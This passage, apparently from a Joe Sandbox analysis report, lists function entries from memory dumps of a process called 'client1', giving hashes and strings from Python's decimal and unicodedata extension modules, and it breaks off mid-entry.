                                                    • API ID: Dealloc$Arg_ContextErr_KeywordsParseStringTupleVar_
                                                    • String ID: optional argument must be a context
                                                    • API String ID: 3219279049-3732962867
                                                    • Opcode ID: 325bdc1bfbd24b0aa6885739e4fe1c449e17a21c9166ede34ebef7ef6c7cda81
                                                    • Instruction ID: 4b8790e4759c736f3210302d366465f4e982971b1715f3571410eaa05b78caf9
                                                    • Opcode Fuzzy Hash: 325bdc1bfbd24b0aa6885739e4fe1c449e17a21c9166ede34ebef7ef6c7cda81
                                                    • Instruction Fuzzy Hash: E1317FA1A1AA07D1EA43CF35E8500BB2BA8FF84B85F5410B2ED4D56664DF3CE547C760
                                                    Function 00007FFBAA706B7C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_ContextErr_KeywordsParseStringTupleVar_
                                                    • String ID: optional argument must be a context
                                                    • API String ID: 3219279049-3732962867
                                                    • Opcode ID: b87bf45db5cbbb77e46f46baf3e26d3246d4270b7567b8a677a967c2b1a6beba
                                                    • Instruction ID: 05e6df3cd439f1fbcc7ad51e1d0bcc119f8f0dca5d4f280212552e587d436717
                                                    • Opcode Fuzzy Hash: b87bf45db5cbbb77e46f46baf3e26d3246d4270b7567b8a677a967c2b1a6beba
                                                    • Instruction Fuzzy Hash: BF3141E2A1AA02D1EA02CF35E8604BB77A8FF44B84F4000B2DD4E16664DE7CF417C760
                                                    Function 00007FFBAA707494 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_ContextErr_KeywordsParseStringTupleVar_
                                                    • String ID: optional argument must be a context
                                                    • API String ID: 3219279049-3732962867
                                                    • Opcode ID: 9d28fdf502c7bf5f3b9c25fda11e0e8947d734ec0ff6c2d04238c1a76da5e97b
                                                    • Instruction ID: b89ce73f0cb433f19d07b5ee88ff2be695b29fe0fa5c82ea32c88bed681f4000
                                                    • Opcode Fuzzy Hash: 9d28fdf502c7bf5f3b9c25fda11e0e8947d734ec0ff6c2d04238c1a76da5e97b
                                                    • Instruction Fuzzy Hash: 7C3173A1A1EA03D1EA428F35E8504BB27E8FF44B85F404072ED4D56664EF3CE507C760
                                                    Function 00007FFBAA70D148 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$List_$AppendBuildValue
                                                    • String ID: O(nsnniiOO)
                                                    • API String ID: 2314222879-2972526296
                                                    • Opcode ID: f5e8065be6b474f415ee3734e356844b7f2e6e7d296775243b8998d91164957b
                                                    • Instruction ID: 5a6ceb9e89e257dd1daf08306c29c2e792d962c1a6cab94a254039a2f6145699
                                                    • Opcode Fuzzy Hash: f5e8065be6b474f415ee3734e356844b7f2e6e7d296775243b8998d91164957b
                                                    • Instruction Fuzzy Hash: FD212A72A0AB42C6E662CF35E85007A77A8FB49B90B044076DF8E53B65DF3CE542C710
                                                    Function 00007FFBAB4A1925 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$AttrObject_PackTuple_
                                                    • String ID: <module>
                                                    • API String ID: 4195104747-217463007
                                                    • Opcode ID: 9274028e41249feebb29f65d6b7a4e23cc81f2c444255d04cf0645aa06cc539f
                                                    • Instruction ID: bb8411e4beb521b5ac400767b6604a8c886982367ca2a973089c1286c4e2d336
                                                    • Opcode Fuzzy Hash: 9274028e41249feebb29f65d6b7a4e23cc81f2c444255d04cf0645aa06cc539f
                                                    • Instruction Fuzzy Hash: C92193E6A0BF0290EA169B66F9906B863A4BF49BD0F44813EDD6D43370DF3CA465C341
                                                    Function 00007FFBAA6FCCF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_Object
                                                    • String ID: internal error in flags_as_exception
                                                    • API String ID: 1617383179-882050087
                                                    • Opcode ID: aa72b05d44a841521da234b747580fd94131bc0fc46fdc4ae2520d83be008423
                                                    • Instruction ID: 47abd22d942b02c092d39737dd500412b195f759e9878fd9f4573ec7abaa892f
                                                    • Opcode Fuzzy Hash: aa72b05d44a841521da234b747580fd94131bc0fc46fdc4ae2520d83be008423
                                                    • Instruction Fuzzy Hash: E1212CA1A0BA02C1EB678F39D85437E26E9AB49F44F0421B6DD0D42764DE2DE45BC721
                                                    Function 00007FFBAB4A1DCA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$AttrObject_PackTuple_
                                                    • String ID: <module>
                                                    • API String ID: 4195104747-217463007
                                                    • Opcode ID: 91db4bdcbe56209661502fd67bbc6f2769c22d5eab679d7ef81084a84b245009
                                                    • Instruction ID: ef50cf56dd0bacdefa39b10bfa9bf029edfda320e6ec6a81b439177d739e9d8a
                                                    • Opcode Fuzzy Hash: 91db4bdcbe56209661502fd67bbc6f2769c22d5eab679d7ef81084a84b245009
                                                    • Instruction Fuzzy Hash: 0D21B0E5E0BF4291EA12AF76F8802B823A4BF45B90F44807ADC6D07370DF3CA5658340
                                                    Function 00007FFBAB4A1AC6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$AttrObject_PackTuple_
                                                    • String ID: <module>
                                                    • API String ID: 4195104747-217463007
                                                    • Opcode ID: 95c1403db506077c69335a7ef06657fa80bb0139eb0d032872015d31a2af1b6c
                                                    • Instruction ID: 40bf90072aac5f9d9c8132dac153d1c04d1ad6fe2966b3f10c09ddbda9348158
                                                    • Opcode Fuzzy Hash: 95c1403db506077c69335a7ef06657fa80bb0139eb0d032872015d31a2af1b6c
                                                    • Instruction Fuzzy Hash: 6A219EF6A0BE1291EA169F76F8946B827A4AF15B90F44C13ACC6D47370EF3CA565C340
                                                    Function 00007FFBAB4A1C48 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$AttrObject_PackTuple_
                                                    • String ID: <module>
                                                    • API String ID: 4195104747-217463007
                                                    • Opcode ID: 3965a657abab878e03acf1ac5dd8a83191bbcc75135b225808ee97793d61faec
                                                    • Instruction ID: cca4e0799c3f14ef1ad820411d8074e5f7e65c60289da9db61d2de58a8bf4289
                                                    • Opcode Fuzzy Hash: 3965a657abab878e03acf1ac5dd8a83191bbcc75135b225808ee97793d61faec
                                                    • Instruction Fuzzy Hash: 13219CE5A0BF1684FA02AF76F8902B923A4BF05B90F48817ADC6D07274DF3CA465D340
                                                    Function 00007FFBAA734D58 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: DoubleErr_Float_FromNumericStringSubtypeType_Unicode_
                                                    • String ID: not a numeric character
                                                    • API String ID: 1034370217-2058156748
                                                    • Opcode ID: e94a4cbcbf0e5bcd60c879edbbe527308af40d50addda8a0dc073dd71fed3554
                                                    • Instruction ID: 03cad2260873cf25666961ce4fd7172d6943871b6700e707ac110c81beffe27b
                                                    • Opcode Fuzzy Hash: e94a4cbcbf0e5bcd60c879edbbe527308af40d50addda8a0dc073dd71fed3554
                                                    • Instruction Fuzzy Hash: 6411A5A1B1F962D5EA5BAF31E41403B63ADAF44B85F0681B0CF0E06658DF2CE4878230
                                                    Function 00007FFBAA707C68 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: String$Arg_DeallocErr_FromKeywordsParseTupleUnicode_
                                                    • String ID: optional argument must be a context
                                                    • API String ID: 1452123296-3732962867
                                                    • Opcode ID: f6cd9f5c3af5eb1d68dd269a83acbfae982e07940d7fa5335d6679faeb9bc316
                                                    • Instruction ID: 3fd82a3b1c13850adcb028b127bd2d1b631fe5b025bf8371ba36870f5a49b3e9
                                                    • Opcode Fuzzy Hash: f6cd9f5c3af5eb1d68dd269a83acbfae982e07940d7fa5335d6679faeb9bc316
                                                    • Instruction Fuzzy Hash: 211164E1A0AA03D0EA028F35E8500BB67ECAF84B95F4000B2DD0E427B4DE6DE14BC360
                                                    Function 00007FFBAA734384 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: DecimalDigitErr_FromLongLong_StringSubtypeType_Unicode_
                                                    • String ID: not a decimal
                                                    • API String ID: 3750391552-3590249192
                                                    • Opcode ID: 1cd0ce8ce41aec67d618eaf50ce9a381a57b186b45043069d79b570d0f92dffd
                                                    • Instruction ID: 4b5ad37267d36307d72b7a8850f9b3def354bd7a650be57425d101dfbb65fa26
                                                    • Opcode Fuzzy Hash: 1cd0ce8ce41aec67d618eaf50ce9a381a57b186b45043069d79b570d0f92dffd
                                                    • Instruction Fuzzy Hash: 3F11A7A1B0AA52C1EF1A6F35E41813E63A8AF44B85F4684B4CE4F47650DF2CE8438330
                                                    Function 00007FFBAB4A0D7B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Dict_ItemList_
                                                    • String ID: <module>
                                                    • API String ID: 3473312925-217463007
                                                    • Opcode ID: 636bfd1e1ccb7f652e57f7f366bec5d5727cc02f6528fe760d78231c756f7c15
                                                    • Instruction ID: f8ef18497f3b2c0a8ffeb4984dc7be0a11b7d3df77b53b15d5ef9d68dd65f546
                                                    • Opcode Fuzzy Hash: 636bfd1e1ccb7f652e57f7f366bec5d5727cc02f6528fe760d78231c756f7c15
                                                    • Instruction Fuzzy Hash: 1B11F7E6E0BA1281FA578B77E9902791A64AF55BD5F04C13ACD3E077B0EE2CB4958301
                                                    Function 00007FFBAA6F38AC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: ContextDeallocErr_FormatFreeFromMem_MemoryUnicode_Var_
                                                    • String ID: Decimal('%s')
                                                    • API String ID: 2420315507-440159776
                                                    • Opcode ID: 3c3e8f2afc2c8420574c3dba0923bb3508b6b31995b6da3f75ecb808d41e5951
                                                    • Instruction ID: f5404bfa4f06fe43b3352b67f0643d48f95e61d0cb48394e754e5bf1d4e57797
                                                    • Opcode Fuzzy Hash: 3c3e8f2afc2c8420574c3dba0923bb3508b6b31995b6da3f75ecb808d41e5951
                                                    • Instruction Fuzzy Hash: CCF081A0A0F603C1EA1B5F39E85407E66A9AF48F80B482071CD1E073A5EE2CE44B8760
                                                    Function 00007FFBAA73441C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: Arg_ArgumentReadyUnicode_
                                                    • String ID: a unicode character$argument$decomposition
                                                    • API String ID: 1875788646-2471543666
                                                    • Opcode ID: 8e092fff27016ad70a75c21de804b5fd7f142a4693611c384d04bc395b3b3e7a
                                                    • Instruction ID: bf31567467bcae324406533f39f3e49a4e93194b3ea7251f7f5afbb862f39c69
                                                    • Opcode Fuzzy Hash: 8e092fff27016ad70a75c21de804b5fd7f142a4693611c384d04bc395b3b3e7a
                                                    • Instruction Fuzzy Hash: 0F01A2E0B0A697E5EA5AEF35E44017A2368AF05B94F4511B1DE6E46290DF3CD4978330
                                                    Function 00007FFBAA7346E8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: Arg_ArgumentReadyUnicode_
                                                    • String ID: a unicode character$argument$east_asian_width
                                                    • API String ID: 1875788646-3913127203
                                                    • Opcode ID: 1cd4da9dc117a34be79d860a1371cb1431d82210e1bfc1e6159635a71f123b29
                                                    • Instruction ID: 506d62107cdebae755435694e744b0efe80b8467a06391ee3fe934af6f5ca7e8
                                                    • Opcode Fuzzy Hash: 1cd4da9dc117a34be79d860a1371cb1431d82210e1bfc1e6159635a71f123b29
                                                    • Instruction Fuzzy Hash: 4D0126E0B0AA47C5EA5AEF31E8441B72368EF06B84F4510B1CE0E06280DF3CE0878330
                                                    Function 00007FFBAA732620 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: Mem_$Capsule_Err_FreeMallocMemory
                                                    • String ID: unicodedata._ucnhash_CAPI
                                                    • API String ID: 3673501854-3989975041
                                                    • Opcode ID: 9c8937bca7593cf83dc6e6686b6a5b89807f230b44c95862bfa962c91a770e15
